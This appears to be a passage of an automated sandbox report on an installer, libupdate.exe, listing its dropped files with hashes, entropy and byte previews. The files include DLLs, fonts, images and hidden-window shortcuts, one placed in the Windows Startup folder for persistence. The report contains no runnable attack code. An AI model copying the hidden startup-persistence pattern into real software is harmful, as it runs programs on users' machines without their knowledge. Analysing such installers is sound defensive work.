                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]=|..\...\...\...@...\...\..P\..{C...\...C..9\...Z...\...C...\..Rich.\..................PE..L.....FM...........!.........`.................................................................................................P....................................................................................................................text...t........................... ..`.rdata........... ..................@..@.data...\...........................@....rsrc...............................@..@.reloc.."...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\is-280TB.tmp\_isetup\_setup64.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):6144
                                                                  Entropy (8bit):4.720366600008286
                                                                  Encrypted:false
                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp
                                                                  Process:C:\Program Files (x86)\MouseJiggler\libupdate.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3292160
                                                                  Entropy (8bit):6.42166755880225
                                                                  Encrypted:false
                                                                  SSDEEP:49152:zEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVA33389:H92bz2Eb6pd7B6bAGx7y333q
                                                                  MD5:3433CBC457B534449FF86EDED3253643
                                                                  SHA1:D16F1585FCC7117F73FB19DC961B29AC871F2F94
                                                                  SHA-256:11080464A75A88CF96D4BEAEA770DFBEB077E95BBA6BAF0E3B7C5D9FF2387942
                                                                  SHA-512:BF5C08AC30786B8E0A7AC55FA167F64567DB9EACDB9F426922AF218F438F44DDDBF339B9B1F86CD7E390383D623B6BD2C25CA2FC2F24DF9AC1E97D4F907E3F4B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@.......................... 3...........@......@....................-......p-.29....-.. ....................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.... ....-.."....-.............@..@..............1.......0.............@..@........................................................
                                                                  C:\Users\user\AppData\Local\Temp\is-TO2A4.tmp\_isetup\_setup64.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):6144
                                                                  Entropy (8bit):4.720366600008286
                                                                  Encrypted:false
                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  Process:C:\Program Files (x86)\MouseJiggler\libupdate.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3292160
                                                                  Entropy (8bit):6.42166755880225
                                                                  Encrypted:false
                                                                  SSDEEP:49152:zEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVA33389:H92bz2Eb6pd7B6bAGx7y333q
                                                                  MD5:3433CBC457B534449FF86EDED3253643
                                                                  SHA1:D16F1585FCC7117F73FB19DC961B29AC871F2F94
                                                                  SHA-256:11080464A75A88CF96D4BEAEA770DFBEB077E95BBA6BAF0E3B7C5D9FF2387942
                                                                  SHA-512:BF5C08AC30786B8E0A7AC55FA167F64567DB9EACDB9F426922AF218F438F44DDDBF339B9B1F86CD7E390383D623B6BD2C25CA2FC2F24DF9AC1E97D4F907E3F4B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@.......................... 3...........@......@....................-......p-.29....-.. ....................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.... ....-.."....-.............@..@..............1.......0.............@..@........................................................
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SQLite Distributed tools\SQLite Distributed tools.lnk
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Fri Oct 1 05:52:37 2021, mtime=Fri Oct 1 05:52:37 2021, atime=Tue Sep 14 05:09:22 2021, length=6177792, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):1080
                                                                  Entropy (8bit):4.886504830768807
                                                                  Encrypted:false
                                                                  SSDEEP:24:8mmg0kVo6cNf1Oh1VAzfQaDktj+1E+xbU+xJm:8mmg0kV7cNnWs1PbfJ
                                                                  MD5:A587210334EA77555CCAF6B1E53C0887
                                                                  SHA1:587397983C44FA56C3C2415F8A92000AC74AADDB
                                                                  SHA-256:CD79EF07065AF44CC4E5911DC9B6A4DDBC70522936D5C9C4918A6766959B3699
                                                                  SHA-512:E3DEE6E7B148889ED853675CF52572CEFA2A3853CCA35D62EA6E9D9C611999BB2A10CFC8D79357AE562691B8459644CF6961A9475869B795BF279336CFD75B34
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: L..................F.... ...<.T..........U../....D^.......................:..DG..Yr?.D..U..k0.&...&...........-...}.M.....-........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny.AS.6.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny.AS.6.....Y....................D1,.R.o.a.m.i.n.g.....z.1.....AS.6..SQLITE~1..b......AS.6AS.6....>K....................x./.S.Q.L.i.t.e. .D.i.s.t.r.i.b.u.t.e.d. .t.o.o.l.s.....f.2..D^..S+1 .sqconfig.exe..J......AS.6AS.6....x.........................s.q.c.o.n.f.i.g...e.x.e.......s...............-.......r..................C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe..4.....\.....\.....\.....\.....\.S.Q.L.i.t.e. .D.i.s.t.r.i.b.u.t.e.d. .t.o.o.l.s.\.s.q.c.o.n.f.i.g...e.x.e.7.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.S.Q.L.i.t.e. .D.i.s.t.r.i.b.u.t.e.d. .t.o.o.l.s.`.......X.......128757...........!a..%.H.VZAj......M..........-..!a..%.H.VZAj......M.....
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sqlite_configurator.lnk
                                                                  Process:C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Fri Oct 1 05:52:37 2021, mtime=Fri Oct 1 05:52:39 2021, atime=Tue Sep 14 05:09:22 2021, length=6177792, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):1008
                                                                  Entropy (8bit):4.967442428225026
                                                                  Encrypted:false
                                                                  SSDEEP:24:84gWRkVoOTVNf18h1VAzfIVlaA1E+xbU+xJm:84gMkVrVNlsz1PbfJ
                                                                  MD5:43E48C3D88224B79F92DF53D816475C7
                                                                  SHA1:19F8BF9F84D2A96B44301ECA4B6230D5A11B10E8
                                                                  SHA-256:3565E25564A05FCDCECE253A859AAD590AEE77C7E97C60C282CBABCA875C2FE8
                                                                  SHA-512:BF98992F61BE52621A5151B4FD19A6B2C7B643DB1914785AFE1D61AC843B84E73BB1706FF694920F4952A9DB3FEA3A53E4BC7FD5EFF55AE5011BC9A2B5B71E25
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: L..................F.... ...<.T...j].....U../....D^.......................:..DG..Yr?.D..U..k0.&...&...........-...}.M....?.w.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny.AS.6.....Y....................f.(.A.p.p.D.a.t.a...B.V.1.....AS.6..Roaming.@.......Ny.AS.6.....Y........................R.o.a.m.i.n.g.....z.1.....AS.6..SQLITE~1..b......AS.6AS.6....>K....................j_!.S.Q.L.i.t.e. .D.i.s.t.r.i.b.u.t.e.d. .t.o.o.l.s.....f.2..D^..S+1 .sqconfig.exe..J......AS.6AS.6....x.........................s.q.c.o.n.f.i.g...e.x.e.......s...............-.......r..................C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe....S.q.l.i.t.e. .C.o.n.f.i.g.u.r.a.t.o.r.4.....\.....\.....\.....\.....\.S.Q.L.i.t.e. .D.i.s.t.r.i.b.u.t.e.d. .t.o.o.l.s.\.s.q.c.o.n.f.i.g...e.x.e.`.......X.......128757...........!a..%.H.VZAj......M..........-..!a..%.H.VZAj......M..........-.E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ....
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\7-zip.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):49664
                                                                  Entropy (8bit):6.001403729469205
                                                                  Encrypted:false
                                                                  SSDEEP:1536:31Lubc0g1XOg1owXOYZhvSAWV3lgtshWy:l6bcBZOg1owBraTV1g2hWy
                                                                  MD5:23C651B2ACE76D42FEC3989BCBA3CE7B
                                                                  SHA1:378776D20133F20A4C42476BDCB0A408EF1DCE1C
                                                                  SHA-256:1B8410F839283A9483369DACDB22290B065ECE6F00C026D953024666761532E2
                                                                  SHA-512:E47AE720B9EE4388DACFDBF2BA1E2DC546CC01FDB25A6C82CEEEDA03801E449F660E97B3BBB6F65B791BFC1566F21187053472022C6C7C0D68F8CF1187326EC8
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I....................l.......................a...........j...l.......a................n\.....(...............Rich............................PE..L....:.V...........!.....x...H.......}.................................................................................................................................................................................D............................text....v.......x.................. ..`.rdata...(.......*...|..............@..@.data...<...........................@....sxdata.............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\CommonManaged.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):51672
                                                                  Entropy (8bit):5.815774561061108
                                                                  Encrypted:false
                                                                  SSDEEP:768:a5zInBstS9qZd0skYYVkkQltb6nE9bljdhtX:a+nBs4qZwlnsblB
                                                                  MD5:8E9CDF436F1F6882E2DD2B3E03B296C2
                                                                  SHA1:B13BB65194A7FC5B9418146D42B2982E7A9839E6
                                                                  SHA-256:2D3DF8DA35FF210B76BA66C9387F375D87407EDFE44A063944236E0F36FFB726
                                                                  SHA-512:7F843451C55B5A2E679516A68B3458FF7390BA06FE8BBDA19717AA452AA139310B1984053EF2537AC5C50DE1D4EF6ED2450DDFC8F70ADB7A0218F1CF3E98119C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.........." ..0.................. ........... ....................................`.................................L...O........................!........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........<...............................................................0..........s......o.....8......(......E....P...............)...6...C...+Y.r...po....+L.r...po....+?.r...po....+2.r...po....+%.r!..po....+..r)..po....+..r1..po......(....:o.............o.....r9..p.(....*..................0.............1...%..,.o....~N...%-.&~M.....Q...s....%.N...(...+~O...%-.&~M.....R...s....%.O...(...+(...+s.....o.....+...( ...(.......o!...-...o".....(#...-...........o......*......j.*...
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\DevExpress.Sparkline.v14.2.Core.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):75744
                                                                  Entropy (8bit):5.893484095124305
                                                                  Encrypted:false
                                                                  SSDEEP:1536:RgBSJNAJU2aRXJ/qsiDhglwcJ/5I83dxog6qzj:RySJNASrXJ/q1UJ/5Icoghn
                                                                  MD5:E891562A855A6E697559D0D922332BC6
                                                                  SHA1:BF0A7C56494A693D88E043E8CB7B6539C25F3500
                                                                  SHA-256:A4E8833818879BE8F847895C0D69173B8593B319076B865F2E197728451CF197
                                                                  SHA-512:1ED26200B018DD49234ED47703B6589444B587829F0765FBF55ECE0FA4B30B182252D32A2D1DA65F122B7BCFB4467AF01FFFB41F49A0C782E6CA3E4E919ACF3D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......T...........!................~%... ...@....... ....................................@.................................0%..K....@.......................`.......#............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`%......H...........X............f...!..P ......................................w..q.K.(..6.....6Q.."]VbX...W.#.1c[.....C...Kn...u~.J.Wk2'....P.q...?v..4.....j3>.q.o..zN.....d...m...sQ.....#z.._..4f.:.. ...,...o....*2.-..*.o-...*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*J.{.....{....(....*J.{.....{....(....*..{....*~.{.........}.....{....-..(....*..{....*~.{.........}.....{....-..(....*..{....*^.{.........}....
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Fonts\Font Awesome 5 Free-Regular-400.otf (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:OpenType font data
                                                                  Category:dropped
                                                                  Size (bytes):97112
                                                                  Entropy (8bit):5.552851690092142
                                                                  Encrypted:false
                                                                  SSDEEP:1536:gV/JKdktBIHzoyNE2Y5UHJItEcLDaC54/CBU8wL7Bx+WKDJJC/:gVJcIOUydcccJwLOJJC/
                                                                  MD5:D39E499B3F8D22CE8F5469B84A4D4700
                                                                  SHA1:7D520149A1CD9781A7BF667F6FB081C8EE2B90F3
                                                                  SHA-256:575A6349013F33353DE1C762AC75D3B33D5686B9F6A377F3615C2238DE68394F
                                                                  SHA-512:D733B108D87782FD71A329865362DBDC07BC74C087D476F4B62856BDE4DA8BE586393C6051A4C31A5CE1465B212E97D434A691F6B23119C26E4561305F018A5B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: OTTO.......PCFF ...@...(..-.FFTM.4....{<....GDEF......9....$GPOSl.t...w.... GSUB.s...98..>.OS/2Q.S(...@...`cmap...........head(/.U.......6hhea.>.).......$hmtxm.....w....Tmaxp..P....8....name9.;".......[post........... .....K..p.Y._.<..........$.......$............................................................P................L.f...G.L.f....................................PfEd... ...........T.........:... . .......V...........6.................................".............^.........&.............!.........,.........................1...........U.............................................4...........6.Q.....................D...........6.&.........L.z.........0...........X.:.....................&.............E.........6.].........&...............C.o.p.y.r.i.g.h.t. .(.c.). .F.o.n.t. .A.w.e.s.o.m.e..Copyright (c) Font Awesome..F.o.n.t. .A.w.e.s.o.m.e. .5. .F.r.e.e. .R.e.g.u.l.a.r..Font Awesome 5 Free Regular..R.e.g.u.l.a.r..Regular..F.o.n.t. .A.w.e.s.o.m.e. .5. .F.r.e.e. .R.e.g.u.l.a.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Fonts\LICENSE.txt (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1548
                                                                  Entropy (8bit):4.735950485566223
                                                                  Encrypted:false
                                                                  SSDEEP:24:CYMWGFuVUjxvcVMlx8HSGl37cCfLUCjY9H3TmthfMQc:93GFEWcKoyWVfLITmXMQc
                                                                  MD5:2E3494502DB283E8891D4886FE445912
                                                                  SHA1:9907C55306FFFB685CE0E06C9E469475035D5FA6
                                                                  SHA-256:E779748DFE75E84F974DF3C7BC07F842011A100159158B0F1F49B2F2A5A515CB
                                                                  SHA-512:9D770610EE5920C9F73CB42D8A413CFB3C7104C9D93603520EC945ECC2B95390BEF6FAD85926C97C877BC980E320832A18D9687251943C1430E98AA2EF5B0473
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: Font Awesome Free License.-------------------------..Font Awesome Free is free, open source, and GPL friendly. You can use it for.commercial projects, open source projects, or really almost whatever you want..Full Font Awesome Free license: https://fontawesome.com/license/free...# Icons: CC BY 4.0 License (https://creativecommons.org/licenses/by/4.0/).In the Font Awesome Free download, the CC BY 4.0 license applies to all icons.packaged as SVG and JS file types...# Fonts: SIL OFL 1.1 License (https://scripts.sil.org/OFL).In the Font Awesome Free download, the SIL OFL license applies to all icons.packaged as web and desktop font files...# Code: MIT License (https://opensource.org/licenses/MIT).In the Font Awesome Free download, the MIT license applies to all non-font and.non-icon files...# Attribution.Attribution is required by MIT, SIL OFL, and CC BY licenses. Downloaded Font.Awesome Free files already contain embedded comments with sufficient.attribution, so you shouldn't need to do a
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Fonts\is-DNBQ7.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:OpenType font data
                                                                  Category:dropped
                                                                  Size (bytes):97112
                                                                  Entropy (8bit):5.552851690092142
                                                                  Encrypted:false
                                                                  SSDEEP:1536:gV/JKdktBIHzoyNE2Y5UHJItEcLDaC54/CBU8wL7Bx+WKDJJC/:gVJcIOUydcccJwLOJJC/
                                                                  MD5:D39E499B3F8D22CE8F5469B84A4D4700
                                                                  SHA1:7D520149A1CD9781A7BF667F6FB081C8EE2B90F3
                                                                  SHA-256:575A6349013F33353DE1C762AC75D3B33D5686B9F6A377F3615C2238DE68394F
                                                                  SHA-512:D733B108D87782FD71A329865362DBDC07BC74C087D476F4B62856BDE4DA8BE586393C6051A4C31A5CE1465B212E97D434A691F6B23119C26E4561305F018A5B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: OTTO.......PCFF ...@...(..-.FFTM.4....{<....GDEF......9....$GPOSl.t...w.... GSUB.s...98..>.OS/2Q.S(...@...`cmap...........head(/.U.......6hhea.>.).......$hmtxm.....w....Tmaxp..P....8....name9.;".......[post........... .....K..p.Y._.<..........$.......$............................................................P................L.f...G.L.f....................................PfEd... ...........T.........:... . .......V...........6.................................".............^.........&.............!.........,.........................1...........U.............................................4...........6.Q.....................D...........6.&.........L.z.........0...........X.:.....................&.............E.........6.].........&...............C.o.p.y.r.i.g.h.t. .(.c.). .F.o.n.t. .A.w.e.s.o.m.e..Copyright (c) Font Awesome..F.o.n.t. .A.w.e.s.o.m.e. .5. .F.r.e.e. .R.e.g.u.l.a.r..Font Awesome 5 Free Regular..R.e.g.u.l.a.r..Regular..F.o.n.t. .A.w.e.s.o.m.e. .5. .F.r.e.e. .R.e.g.u.l.a.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Fonts\is-HPQC0.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1548
                                                                  Entropy (8bit):4.735950485566223
                                                                  Encrypted:false
                                                                  SSDEEP:24:CYMWGFuVUjxvcVMlx8HSGl37cCfLUCjY9H3TmthfMQc:93GFEWcKoyWVfLITmXMQc
                                                                  MD5:2E3494502DB283E8891D4886FE445912
                                                                  SHA1:9907C55306FFFB685CE0E06C9E469475035D5FA6
                                                                  SHA-256:E779748DFE75E84F974DF3C7BC07F842011A100159158B0F1F49B2F2A5A515CB
                                                                  SHA-512:9D770610EE5920C9F73CB42D8A413CFB3C7104C9D93603520EC945ECC2B95390BEF6FAD85926C97C877BC980E320832A18D9687251943C1430E98AA2EF5B0473
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: Font Awesome Free License.-------------------------..Font Awesome Free is free, open source, and GPL friendly. You can use it for.commercial projects, open source projects, or really almost whatever you want..Full Font Awesome Free license: https://fontawesome.com/license/free...# Icons: CC BY 4.0 License (https://creativecommons.org/licenses/by/4.0/).In the Font Awesome Free download, the CC BY 4.0 license applies to all icons.packaged as SVG and JS file types...# Fonts: SIL OFL 1.1 License (https://scripts.sil.org/OFL).In the Font Awesome Free download, the SIL OFL license applies to all icons.packaged as web and desktop font files...# Code: MIT License (https://opensource.org/licenses/MIT).In the Font Awesome Free download, the MIT license applies to all non-font and.non-icon files...# Attribution.Attribution is required by MIT, SIL OFL, and CC BY licenses. Downloaded Font.Awesome Free files already contain embedded comments with sufficient.attribution, so you shouldn't need to do a
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Images\ExeIcon.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):15050
                                                                  Entropy (8bit):7.720697171460719
                                                                  Encrypted:false
                                                                  SSDEEP:384:SWnwYPAxo1jf/uYK6Qm7lhkz2p+v2pX6pJa8uhdN2Z8:ZwYneT6Qm0zP8SZ8
                                                                  MD5:692C054B84C6D42288FEF1148DE9C662
                                                                  SHA1:12ADBAB728E3E008BF1C2825022B6D8CFDDC5511
                                                                  SHA-256:38A8A229A79CE48A4F6FD720C6693DA11A8CBE6AF160092149AD50ADA58D97F9
                                                                  SHA-512:96DCBDDA25E8821A8D7FCAA97A279308D5BACB7894BA31E51B67BDEC6FA535BE20025FAEF6E0C63900649F9985A22E6F31A7CA7D84BD1A1100B21343DAF20CE7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR..............x......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmp:CreateDate="2019-09-28T12:37:04-05:00" xmp:MetadataDate="2019-09-28T12:37:04-05:00" xmp:ModifyDate="2019-09-28T12:37:04-05:00" xmpMM:InstanceID="xmp.iid:551d15ca-913b-f34c-98d9-318f319e6f37" xmpMM:DocumentID="adobe:docid:photoshop:8e931143-2477-6843-a821-16b1208fff60" xmpMM:OriginalDocumentID="xmp.did:7f532148-418c-9b48-95bf-b8594cd837cd" dc:format="i
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Images\app_plugin_control_16.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):626
                                                                  Entropy (8bit):7.532398674376607
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/72rxs+Ea6c8e8x8gMppPQI3Y8nHYQLTWWi9aJCrpghJeGjSbuWDop6SztN:3q+EFN+ppPVHnjHNErpE7SbrDoHN
                                                                  MD5:B56B675809D84482E2C0AFBE5058EB10
                                                                  SHA1:D2FD2E37C753EAC29FB925512871A4E11B8F0BBC
                                                                  SHA-256:98782D713D12B49595B100497E24D3C8D4AB111A5F9A66C630BD3F95D9303DF8
                                                                  SHA-512:550B2A2DBCF8250D24147ACE58B76D5E52BEE2F9C60688463F51E1CBE40D36EF55C8BBC6641B555839DD7B3C1EF457C9F6782D41103E9ECF9F17D6776464D9AA
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.SMo.@.}.u.n....S).8..P.8QB.*..s.[~Y..84.pA..BE.\....~@.-...4Y....dUb..ww....(.c...h.XV.$}.......!c...0.K.b..._.9#..u.O...p."...y.L.h6.;.L...%-......8x...i......T...%........~H.t....-:HT.........#BA.../....B....{o.2....*c*.Q..o....,.y...G*.d".$@H..Z.^.D...axB..,....,.Z..M......yU..Z........+.x...*.......R.......7....X.A|w.....4..a..N.0L.g.,....,...[...`.8..l4...p.n..'.....,R.M....I..\...&.\T....>..4.{.yV.i,b....bV.".uv.U.i.L&.N..Q...K.|o.V....H.^...tP......r.....v......z.).&.|n= ...8..%.%...?....d...v......IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Images\app_plugin_control_32.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):1660
                                                                  Entropy (8bit):7.861742067744583
                                                                  Encrypted:false
                                                                  SSDEEP:24:+zxKvG6a5cOpCnE4eItXQH1uPIvNbuplfaqqFfizxTfjpEQScUe4TeacKfpMHVkv:cNzd4edHBVbGiqbTfnSc+CNoPEaRZz
                                                                  MD5:69CD4229AC3C37B6F09697BD9B39546E
                                                                  SHA1:D7FD11FDD0CAE018005A9708C4E836BEC0C59ACF
                                                                  SHA-256:F72014A1D70B31C972D8A9F442F51EEC75FE518AA0C22184AC807FC01BA5C755
                                                                  SHA-512:E4CFEA6EAE24892A5AEBA757195A6411E47989B0256B3A7B3BF58B0F501F3E78B9CDA1A26FEBF6B954E4B41953F1C301A08E11F2A8E42F20FFE59F0F1AD48B1A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.WklSe.~....vc...@v..H@1.&..)........?(`B$..d..a.A.obB.. 1...(l.\.vsl...m......J../y..|=..}.....?..].VsC.W.R@4.M......9.#.a.K&e.......?....N..=.......`..5.9s.1>.^..Nb./--.L.gf.....A..;....".p/...%....%..2.T......c.8....$..jt&m....S.)..T.d2.Z.v.f.....wL...,..t ..erb.... ..P.e..pNM.........>}....7.(..6VV.s.N.:.....@$..z..x:...F.e...}?ON.t..E.Z.@y..U7*-g...>...)..u=..r.G"Pf.COO.3....h......:T".!r@K..x.-.Y.}..FFF......xe..(......Z....x....)..LZ.....B...2.Q......B..n.a.#...H..........xT....".#T2C.A.d...i..S.Tn..)..: .K......IT2.. ...#..Y...J....^..P2.....p>...Z.;w....>.(.EX+.P..V+..............z......FFG.n.(...E.&g-.$....~.X....SDv4.._.....E..Z]]..Y.d)2%......K..F.......V.......mb..........,...<..{...645...^.&lko.{...>.e...L..........z...;v.7N48'6L..{..T.Ci<.q.2`.;`{k[.7B..x...D.@.......y.[.8.p.P08..J...*....6.X,.cc........m-.M.z5*...l.2.+ .....LS..D..z.Ng.U2$.v.Z.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Images\icon.png (copy)
